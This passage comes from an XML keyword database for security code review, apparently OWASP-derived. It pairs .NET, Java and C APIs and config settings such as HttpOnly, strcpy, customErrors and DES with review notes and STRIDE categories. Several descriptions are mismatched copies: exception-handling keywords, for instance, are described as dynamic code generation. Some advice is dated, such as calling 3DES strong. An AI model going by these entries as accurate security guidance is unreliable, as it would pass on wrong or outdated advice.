</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>ProtectedMemory</k_name>
<k_level>2</k_level>
<k_description>If storing sensitive data in memory recommend one uses the following.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>HttpOnly</k_name>
<k_level>2</k_level>
<k_description>Cookie manipulation can be key to various application security exploits such as session hijacking/fixation and parameter manipulation. One should examine any code relating to cookie functionalty as this would have a bearing on session security.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>System.NET.Cookie</k_name>
<k_level>2</k_level>
<k_description>Cookie manipulation can be key to various application security exploits such as session hijacking/fixation and parameter manipulation. One should examine any code relating to cookie functionalty as this would have a bearing on session security.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>&lt;frame security</k_name>
<k_level>2</k_level>
<k_description>Many of the HTML tags below can be used for client side attacks such as cross site scripting. It is important to examine the context in which these tags are used and to examine any relevant data validation associated with the display.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>&lt;iframe security</k_name>
<k_level>2</k_level>
<k_description>Many of the HTML tags below can be used for client side attacks such as cross site scripting. It is important to examine the context in which these tags are used and to examine any relevant data validation associated with the display.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>system.web.ui.htmlcontrols.htmlinputhidden</k_name>
<k_level>2</k_level>
<k_description>The input controls below are server classes used to produce and display web application form fields. Looking for such references helps locate entry points into the application.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>system.web.ui.webcontrols.textbox</k_name>
<k_level>2</k_level>
<k_description>The input controls below are server classes used to produce and display web application form fields. Looking for such references helps locate entry points into the application.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>system.web.ui.webcontrols.listbox</k_name>
<k_level>2</k_level>
<k_description>The input controls below are server classes used to produce and display web application form fields. Looking for such references helps locate entry points into the application.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>system.web.ui.webcontrols.checkboxlist</k_name>
<k_level>2</k_level>
<k_description>The input controls below are server classes used to produce and display web application form fields. Looking for such references helps locate entry points into the application.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>system.web.ui.webcontrols.dropdownlist</k_name>
<k_level>2</k_level>
<k_description>The input controls below are server classes used to produce and display web application form fields. Looking for such references helps locate entry points into the application.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>requestEncoding</k_name>
<k_level>2</k_level>
<k_description>The .NET Framework relies on .config files to define configuration settings. The .config files are text-based XML files. Many .config files can, and typically do, exist on a single system. Web applications refer to a web.config file located in the application&apos;s root directory. For ASP.NET applications, web.config information about most aspects of the application&apos;s operation.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>responseEncoding</k_name>
<k_level>2</k_level>
<k_description>The .NET Framework relies on .config files to define configuration settings. The .config files are text-based XML files. Many .config files can, and typically do, exist on a single system. Web applications refer to a web.config file located in the application&apos;s root directory. For ASP.NET applications, web.config information about most aspects of the application&apos;s operation.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>trace</k_name>
<k_level>2</k_level>
<k_description>The .NET Framework relies on .config files to define configuration settings. The .config files are text-based XML files. Many .config files can, and typically do, exist on a single system. Web applications refer to a web.config file located in the application&apos;s root directory. For ASP.NET applications, web.config information about most aspects of the application&apos;s operation.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>authorization</k_name>
<k_level>2</k_level>
<k_description>The .NET Framework relies on .config files to define configuration settings. The .config files are text-based XML files. Many .config files can, and typically do, exist on a single system. Web applications refer to a web.config file located in the application&apos;s root directory. For ASP.NET applications, web.config information about most aspects of the application&apos;s operation.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>CustomErrors</k_name>
<k_level>2</k_level>
<k_description>The .NET Framework relies on .config files to define configuration settings. The .config files are text-based XML files. Many .config files can, and typically do, exist on a single system. Web applications refer to a web.config file located in the application&apos;s root directory. For ASP.NET applications, web.config information about most aspects of the application&apos;s operation.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>httpRuntime</k_name>
<k_level>2</k_level>
<k_description>The .NET Framework relies on .config files to define configuration settings. The .config files are text-based XML files. Many .config files can, and typically do, exist on a single system. Web applications refer to a web.config file located in the application&apos;s root directory. For ASP.NET applications, web.config information about most aspects of the application&apos;s operation.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>maxRequestLength</k_name>
<k_level>2</k_level>
<k_description>The .NET Framework relies on .config files to define configuration settings. The .config files are text-based XML files. Many .config files can, and typically do, exist on a single system. Web applications refer to a web.config file located in the application&apos;s root directory. For ASP.NET applications, web.config information about most aspects of the application&apos;s operation.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>forms protection</k_name>
<k_level>2</k_level>
<k_description>The .NET Framework relies on .config files to define configuration settings. The .config files are text-based XML files. Many .config files can, and typically do, exist on a single system. Web applications refer to a web.config file located in the application&apos;s root directory. For ASP.NET applications, web.config information about most aspects of the application&apos;s operation.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>appSettings</k_name>
<k_level>2</k_level>
<k_description>The .NET Framework relies on .config files to define configuration settings. The .config files are text-based XML files. Many .config files can, and typically do, exist on a single system. Web applications refer to a web.config file located in the application&apos;s root directory. For ASP.NET applications, web.config information about most aspects of the application&apos;s operation.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>Insert</k_name>
<k_level>2</k_level>
<k_description>It is recommende not to use this function directly in code. If used in client side code could be fatal to database integrity</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
<Item number="2">
<Category>Denial of Service</Category>
<Control>Avalability</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>ValidateRequest</k_name>
<k_level>2</k_level>
<k_description>Not validating all input data to a list of potentially dangerous values could be fatal, it is recommended to use build in security features of the framework. Logging this can also be a source of information leakage. It is important to examine all calls to the logging subsystem and to determinate if any sensitive information is being logged. Common mistakes are logging userID in conjuction with passwords within the authentication functionality or logging database requests which may contains sensitive data.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Avalability</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>ObjectInputStream</k_name>
<k_level>2</k_level>
<k_description>This command are generally used to read data into ones application. They may be potential entry points into application. The entry points may be from an external source and must be inverstigated. Can be also used in path traversal attacks or DoS attacks.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>pipedinputstream</k_name>
<k_level>2</k_level>
<k_description>This command are generally used to read data into ones application. They may be potential entry points into application. The entry points may be from an external source and must be inverstigated. Can be also used in path traversal attacks or DoS attacks.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>objectstream</k_name>
<k_level>2</k_level>
<k_description>This command are generally used to read data into ones application. They may be potential entry points into application. The entry points may be from an external source and must be inverstigated. Can be also used in path traversal attacks or DoS attacks.</k_description>
<link>http://www.owas.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>strcpy</k_name>
<k_level>2</k_level>
<k_description>Watch out legacy methods calls.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Avalability</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>printf</k_name>
<k_level>2</k_level>
<k_description>Watch out legacy methods calls.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Avalability</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>deny</k_name>
<k_level>2</k_level>
<k_description>The .NET Framework relies on .config files to define configuration settings. The .config files are text-based XML files. Many .config files can, and typically do, exist on a single system. Web applications refer to a web.config file located in the application&apos;s root directory. For ASP.NET applications, web.config information about most aspects of the application&apos;s operation.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>credentials</k_name>
<k_level>2</k_level>
<k_description>The .NET Framework relies on .config files to define configuration settings. The .config files are text-based XML files. Many .config files can, and typically do, exist on a single system. Web applications refer to a web.config file located in the application&apos;s root directory. For ASP.NET applications, web.config information about most aspects of the application&apos;s operation.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>identity impersonate</k_name>
<k_level>2</k_level>
<k_description>The .NET Framework relies on .config files to define configuration settings. The .config files are text-based XML files. Many .config files can, and typically do, exist on a single system. Web applications refer to a web.config file located in the application&apos;s root directory. For ASP.NET applications, web.config information about most aspects of the application&apos;s operation.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>timeout</k_name>
<k_level>2</k_level>
<k_description>The .NET Framework relies on .config files to define configuration settings. The .config files are text-based XML files. Many .config files can, and typically do, exist on a single system. Web applications refer to a web.config file located in the application&apos;s root directory. For ASP.NET applications, web.config information about most aspects of the application&apos;s operation.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Tampering with Data</Category>
<Control>Integrity</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>Application_OnAuthenticateRequest</k_name>
<k_level>2</k_level>
<k_description>Each application has it&apos;s own global.asax if one is required. Global.asax sets the event code and values forn an application using scripts. One must ensure that application variables do not contains sensitive informations, as they are accessible to the whole application and to all users within it.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Repudiation</Category>
<Control>Non Repudiation</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>Application_OnAuthorizeRequest</k_name>
<k_level>2</k_level>
<k_description>Each application has it&apos;s own global.asax if one is required. Global.asax sets the event code and values forn an application using scripts. One must ensure that application variables do not contains sensitive informations, as they are accessible to the whole application and to all users within it.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Repudiation</Category>
<Control>Non Repudiation</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>Session_OnStart</k_name>
<k_level>2</k_level>
<k_description>Each application has it&apos;s own global.asax if one is required. Global.asax sets the event code and values forn an application using scripts. One must ensure that application variables do not contains sensitive informations, as they are accessible to the whole application and to all users within it.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Repudiation</Category>
<Control>Non Repudiation</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>Session_OnEnd</k_name>
<k_level>2</k_level>
<k_description>Each application has it&apos;s own global.asax if one is required. Global.asax sets the event code and values forn an application using scripts. One must ensure that application variables do not contains sensitive informations, as they are accessible to the whole application and to all users within it.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Repudiation</Category>
<Control>Non Repudiation</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>log4net</k_name>
<k_level>2</k_level>
<k_description>Logging can be a source of information leakage. It is important to examine all calls to the logging subsystem and to determinate if any sensitive information is being logged. Common mistakes are logging userID in conjuction with passwords within the authentication functionality or logging database requests which may contains sensitive data.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Denial of Service</Category>
<Control>Avalability</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>System.Diagnostics.Debug</k_name>
<k_level>2</k_level>
<k_description>Logging can be a source of information leakage. It is important to examine all calls to the logging subsystem and to determinate if any sensitive information is being logged. Common mistakes are logging userID in conjuction with passwords within the authentication functionality or logging database requests which may contains sensitive data.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Denial of Service</Category>
<Control>Avalability</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>System.Diagnostics.Trace</k_name>
<k_level>2</k_level>
<k_description>Logging can be a source of information leakage. It is important to examine all calls to the logging subsystem and to determinate if any sensitive information is being logged. Common mistakes are logging userID in conjuction with passwords within the authentication functionality or logging database requests which may contains sensitive data.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Denial of Service</Category>
<Control>Avalability</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>Thread</k_name>
<k_level>2</k_level>
<k_description>Locating code that contains multithreaded functions. Concurrency issuses can result in race conditions which may resutl in security vulnerabilities. The Treat keyword is where new threats object are created. Code that uses static global variables which hold sensitive security informations may cause session issues. Code that uses static constructors may also cause issues between threads. Not synchronizing the Dispose method may cause issues if a number of threats call Dispose at the same time, this may cause resource release issues.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Denial of Service</Category>
<Control>Avalability</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>Dispose</k_name>
<k_level>2</k_level>
<k_description>Locating code that contains multithreaded functions. Concurrency issuses can result in race conditions which may resutl in security vulnerabilities. The Treat keyword is where new threats object are created. Code that uses static global variables which hold sensitive security informations may cause session issues. Code that uses static constructors may also cause issues between threads. Not synchronizing the Dispose method may cause issues if a number of threats call Dispose at the same time, this may cause resource release issues.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Avalability</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>Public</k_name>
<k_level>1</k_level>
<k_description>Public and Sealed relate to the design at class level. Classes which are not intended to be derived from should be sealed. Make sure all class fields are public for a reason. Don&apos;t expose anything you do not need to.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>Sealed</k_name>
<k_level>2</k_level>
<k_description>Public and Sealed relate to the design at class level. Classes which are not intended to be derived from should be sealed. Make sure all class fields are public for a reason. Don&apos;t expose anything you do not need to.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
<Item number="2">
<Category>Elevation of privilege</Category>
<Control>Authorization</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>Serializable</k_name>
<k_level>2</k_level>
<k_description>Main disadvantage of serialization from security perspective is that, it can cause resource overhead to CPU and I/O devices as well as it's a comparatively slow communication technology. In case of XML serialisation it is insecure and occupy lot of space on disk/ memory and database and it has limitation of being accessible from public declared classess only.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Avalability</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>AllowPartiallyTrustedCallersAttribute</k_name>
<k_level>2</k_level>
<k_description>It is recommended to check your defined classess for any security vulnerability, if done so then check for permissions of each caller in the stack. If ANY of those callers do not have the required permission then this is a Security Exception need to be managed or removed. To make it more simpler by default a ASP.NET Web Application that is running in a partial trust scenario cannot call for a strongly named assembly but the only way to call an assembly with a strong name is if the strong named assembly is marked with the AllowPartiallyTrustedCallersAttribute (APTCA)</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Avalability</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>GetObjectData</k_name>
<k_level>2</k_level>
<k_description>The GetObjectData function is used to serialize the object, and the specialized constructor is used to deserialize the object. The constructor and GetObjectData are passed the same parameters: an instance of the SerializationInfo class and an instance of the StreamingContext structure. Code that calls GetObjectData requires the SecurityPermission for providing serialization services. Associated enumeration: SecurityPermissionFlag.SerializationFormatter.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Avalability</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>Strongk_nameIdentityPermission</k_name>
<k_level>2</k_level>
<k_description>Identity permissions help protect code from unauthorized access. The runtime grants identity permissions when the assembly is loaded based on the evidence that is provided this means Link demands using StrongNameIdentityPermissionAttribute succeed if only the immediate caller has the correct evidence.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Avalability</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>Strongk_nameIdentity</k_name>
<k_level>2</k_level>
<k_description>CLR (common language runtime) validates the identity of the assembly provided to it by the loader or host. Thehost can be a server host (Asp.Net) or a shell host (command line). This identity, also called as the Evidence, can be a strong name (StrongNameIdentityPermission), originating Zone that is Intranet, Internet or Trusted site (ZoneIdentitypermission), publishers digitalsignature (PublisherIdentityPermission), originating URL(URLIdentityPermission) or originating website(WebSiteIdentityPermission). Here in this case one of the attributes are missing or misconfigured.</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Avalability</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>catch{</k_name>
<k_level>2</k_level>
<k_description>Code may be generated dynamically at runtime. Code that is generated dynamically as a function of external input may give rise to issues. If your code contains sensitive data does it need to be serialized?</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Avalability</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>Finally</k_name>
<k_level>2</k_level>
<k_description>Code may be generated dynamically at runtime. Code that is generated dynamically as a function of external input may give rise to issues. If your code contains sensitive data does it need to be serialized?</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Avalability</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>trace enabled</k_name>
<k_level>2</k_level>
<k_description>Code may be generated dynamically at runtime. Code that is generated dynamically as a function of external input may give rise to issues. If your code contains sensitive data does it need to be serialized?</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Avalability</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>customErrors mode</k_name>
<k_level>2</k_level>
<k_description>Code may be generated dynamically at runtime. Code that is generated dynamically as a function of external input may give rise to issues. If your code contains sensitive data does it need to be serialized?</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Denial of Service</Category>
<Control>Avalability</Control>
</Item>
<Item number="2">
<Category>Information Disclosure</Category>
<Control>Confidentiality</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>xor</k_name>
<k_level>2</k_level>
<k_description>If cryptography is used then is a strong enough cipher used i.e. AES or 3DES. What size key is used, the larger the better. Where is hashing performed. Are password that are being persisted hashed, they should be. How are random numbers generated? is the PRNG &quot;random enough&quot;?</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Repudiation</Category>
<Control>Non-Repudiation</Control>
</Item>
<Item number="2">
<Category>Spoofing Identity</Category>
<Control>Authentication</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>DES</k_name>
<k_level>1</k_level>
<k_description>If cryptography is used then is a strong enough cipher used i.e. AES or 3DES. What size key is used, the larger the better. Where is hashing performed. Are password that are being persisted hashed, they should be. How are random numbers generated? is the PRNG &quot;random enough&quot;?</k_description>
<link>http://www.owasp.org</link>
<Stride>
<Item number="1">
<Category>Repudiation</Category>
<Control>Non-Repudiation</Control>
</Item>
<Item number="2">
<Category>Spoofing Identity</Category>
<Control>Authentication</Control>
</Item>
</Stride>
<k_owaspguidelines>TODO</k_owaspguidelines>
</KeyPointer>
<KeyPointer>
<k_name>RNGCryptoServiceProvider</k_name>
<k_level>2</k_level>
<k_description>If cryptography is used then is a strong enough cipher used i.e. AES or 3DES. What size key is used, the larger the better. Where is hashing performed. Are password that are being persisted hashed, they should be. How are random numbers generated? is the PRNG &quot;random enough&quot;?</k_description>
